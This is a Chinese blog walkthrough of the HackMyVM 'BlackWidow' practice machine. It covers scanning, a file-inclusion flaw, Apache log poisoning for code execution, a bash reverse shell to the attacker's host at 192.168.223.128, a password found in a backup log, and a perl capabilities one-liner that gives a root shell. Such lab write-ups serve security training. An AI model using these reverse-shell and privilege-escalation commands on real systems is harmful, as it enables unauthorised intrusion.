BlackWidow靶场

最新推荐文章于 2024-07-04 22:10:49 发布
最新推荐文章于 2024-07-04 22:10:49 发布
阅读量692 收藏 11
点赞数 11
分类专栏: hackmyvm 文章标签: 网络 网络空间安全 内网渗透 WEB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34942239/article/details/136296879
版权
文章描述了使用KaliLinux进行主机发现、端口扫描(包括识别出ApacheRCE漏洞),并通过目录穿越和敏感信息查找发现LFI漏洞。进一步利用Apache日志实现远程代码执行,利用Perl的capabilities实现提权,最终获取root权限的过程。
摘要由CSDN通过智能技术生成

kali:192.168.223.128

主机发现

nmap -sP 192.168.223.0/24

目标IP:192.168.223.153

端口扫描

nmap -sV -p- -A 192.168.223.153

22/tcp    open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp    open  http     Apache httpd 2.4.38 ((Debian))
111/tcp   open  rpcbind  2-4 (RPC #100000)
2049/tcp  open  nfs      3-4 (RPC #100003)
40703/tcp open  mountd   1-3 (RPC #100005)
41361/tcp open  nlockmgr 1-4 (RPC #100021)
57993/tcp open  mountd   1-3 (RPC #100005)
60003/tcp open  mountd   1-3 (RPC #100005)

先看web,只有一张图片

目录扫描

gobuster dir -u http://192.168.223.153 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

有个company目录,进入看看

源码里面有个php文件

上面提示文件还包含的参数是file

测试一下

目录穿越成功LFI

之前端口扫描的时候80端口是apache服务,那么可以利用apache日志包含来进行rce

apache2日志目录在/var/log/apache2/access.log

可以看到确实能读取日志文件

抓个包把Agent改成一句话

然后反弹个shell,注意get传参url编码

1=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.223.128%2F4567%20%200%3E%261'

编码前1=bash -c 'bash -i >& /dev/tcp/192.168.223.128/4567  0>&1'

然后就是翻敏感信息

home下只有一个用户viper

在备份文件夹下面有个auth.log

找到viper的密码 ?V1p3r2020!?

成功连上

找到第一个flag

继续翻文件,翻了一圈没什么常规的提权手段,用工具linpeas.sh扫描

好像可以capabilities提权

是个perl程序

搜索相关exp

linux系统利用可执行文件的Capabilities实现权限提升_capabilities提权-CSDN博客

perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

./arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

成功提升到root权限拿到flag

总结:1.apache日志包含RCE

        2.敏感信息查找

        3.capabilities perl提权

        

tao0845
关注
  • 11
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透靶场——HackMyVM:BlackWidow
tlovejr的博客
04-06 3141
部署环境 提供镜像文件后,直接用虚拟机打开即可,kali攻击机用VMware打开即可,靶机用vbox打开即可 kali攻击机ip地址:192.168.1.11(桥接) 靶机ip地址:(桥接自动获取ip) 目标: user.txt和root.txt 信息收集 扫描主机 arp-scan -l 发现存活主机ip地址:192.168.1.118 扫描端口 扫描靶机开放的服务端口 nmap -A -T4 -p- 192.168.1.118 在这里发现了很多开放的端口,那么我们还是老规矩,先在80端口进
浏览器辅助工具 BlackWidow v6.28
10-22
BlackWidow v6.28 是一款专为提升在线浏览体验而设计的高效离线浏览器辅助工具。这款软件的主要功能在于帮助用户便捷地下载并保存整个网站内容,以便在没有网络连接的情况下也能访问。其核心特性包括: 1. **多级...
【VulnHub】【2023年07月18日】最新全部靶场详情(上)
惟忆
07-18 8519
【代码】【VulnHub】【2023年07月18日】最新全部靶场详情(上)
vulnhub靶场之Black-Widow-final
weixin_42478365的博客
05-02 1005
将一句话木马写入日志,并配合文件读取漏洞Getshell;Capabilities(perl)提权
黑寡妇优化算法(Black Widow Optimization Algorithm, BWOA)
qq_18823753的博客
10-26 2997
黑寡妇优化算法(Black Widow Optimization Algorithm, BWOA)是由Adria´n F. Peña-Delgado等人于2020年提出的,该作者也是跳蛛优化算法(Jumping Spider Optimization Algorithm, JSOA)的作者之一。BWOA通过模仿蜘蛛求偶时不同的运动策略,对搜索空间进行探索和开发。
【CodeForces】704 C. Black Widow 动态规划+模拟
weixin_34087307的博客
01-16 182
【题目】C. Black Widow 【题意】给定一个表达式,形式为(...)^(...)^......^(...)=1(n个括号),括号中为1~2个值取或。有m个变量,给出表达式的值为xi或 !xi,xi只能为0或1,求变量赋值使得表达式成立的方案数。每个变量至多出现两次。n,m<=10^5。 【算法】动态规划+模拟 【题解】每个括号视为一个点,对于同时出现在两个括号内的变量将两个点...
Black Widow CodeForces - 704C (dp)
weixin_30741653的博客
02-23 180
大意: 给定一个m个bool变量的方程, 求方程解的个数 给定方程的形式类似于这样 每个括号是一个子式, 每个子式里变量数不超过2, 每个变量出现次数不超过2, 方程右侧一直是1 转载于:https://www.cnblogs.com/uid001/p/10422137.html...
黑寡妇(BlackWidow):一款智能网络监控与安全分析工具
gitblog_00016的博客
04-19 419
黑寡妇(BlackWidow):一款智能网络监控与安全分析工具 项目地址:https://gitcode.com/1N3/BlackWidow 项目简介 黑寡妇(BlackWidow) 是一个开源的网络安全扫描和监控工具,由开发者 1N3 创建。它使用Python编写,旨在帮助网络管理员、安全研究人员和普通用户识别潜在的安全漏洞和网络异常,从而提高网络防御能力。 技术分析 BlackWidow ...
【智能优化算法】黑寡妇优化算法(Black Widow Optimization Algorithm,BWOA)
yuchunyu12的博客
05-10 418
黑寡妇优化算法(Black Widow Optimization Algorithm,BWOA)是期刊“”的智能优化算法。
Razer BlackWidow Lite 雷蛇黑寡妇轻量版键盘测评
yzhhz_2018的博客
11-29 1377
原文标题:Razer BlackWidow Lite Keyboard Review: Simple Looks, Great Key Feel 原文作者: Avram Piltch 译文出自:云子可信官方论坛 本文永久链接:https://bbs.cloudtrust.com.cn/thread-389-1-1.html 译者:云子可信汉化组 如今大多数台式机的标配是橡胶圆顶轴的键盘,如果您...
BlackWidow v6.28.zip
07-03
BlackWidow是一个非常不错的离线浏览程序。可以方便的设置下载的网站的级数,以及下载文件的类型。特别提供自动的压缩功能,可以使你节省不少硬盘空间。同时,它还提供一个管理数据库,可以使你快捷方便的找到所需...
blackwidow:仪表盘
05-24
https://blackwidow.surge.sh/examples/external_data.json https://blackwidow.surge.sh/examples/chartd.json https://blackwidow.surge.sh/examples/countdown.json 仪表板API 仪表板是一个由JSON对象描述的表格...
Python-BlackWidow基于Python的Web应用程序扫描程序
08-12
Python-BlackWidow是一个基于Python的Web应用程序扫描工具,专为安全研究人员和渗透测试人员设计,用于在目标网站上执行在线情报收集(OSINT)和模糊测试(Fuzzing)。这个工具的主要目的是帮助发现OWASP(开放网络...
BlackWidow - 基于Python的Web应用程序扫描程序-python
06-18
关于:BlackWidow 是一个基于 Python 的网络应用程序蜘蛛,用于从目标网站收集子域、URL、动态参数、电子邮件地址和电话号码。 该项目还包括 Inject-X 模糊器,用于扫描动态 URL 以查找常见的 OWASP 漏洞。 演示...
Iperf基本用法
最新发布
peterhunter0320的博客
07-04 241
Iperf支持TCP和UDP协议,可以用于点对点或客户端-服务器等模式的网络测试。在Windows系统中,您可以下载Iperf的预编译版本,并将其解压到任意文件夹中。以上是Iperf的一些基本用法,您可以根据实际需要调整各种参数来满足不同的测试需求。更多详细的使用方法和参数,您可以通过运行iperf3 -h命令来查看帮助文档。在Linux系统中,您可以使用包管理器安装Iperf。Iperf的使用非常灵活,可以通过命令行参数来调整测试的各种参数。iperf3 -c <服务器IP地址> -u -b 10M。
2023-2024华为ICT大赛中国区 实践赛网络赛道 全国总决赛 理论部分真题
gaogao0305的博客
07-02 494
本文为2023-2024华为ICT大赛 中国区 全国总决赛 实践赛 网络赛道 理论部分考试真题,涵盖数通模块10题、安全模块7题、WLAN模块3题
Linux:系统安全及应用
pangdongqiqi的博客
07-01 1146
通过su命令可以非常方便地切换为另一个用户,但前提条件是必须知道目标用户的登 录密码。例如,若要从zhangsan 用户切换为 root 用户,必须知道 root 用户的密码。对于生产环 境中的 Linux 服务器,每多一个人知道特权密码,其安全风险也就增加一分。有没有一种折中的办法,既可以让普通用户拥有一部分管理权限,又不需要将 root 用户的密码告诉他呢?答案是肯定的,使用 sudo命令就可以提升执行权限。
常见网络攻击方式及防御方法
2301_76786857的博客
07-04 358
网络攻击对个人、组织和整个社会都带来了严重的威胁,因此必须采取有效的安全措施来保护网络系统和用户的信息安全。
widow安装redis
07-15
要在Windows上安装Redis,您可以按照以下步骤进行操作: ... 2. 解压下载的Redis压缩包到您选择的目录,例如 `C:\Redis`。 3. 在Redis目录中找到 `redis.windows.conf` 文件,并将其重命名为 `redis.conf`。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tao0845

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值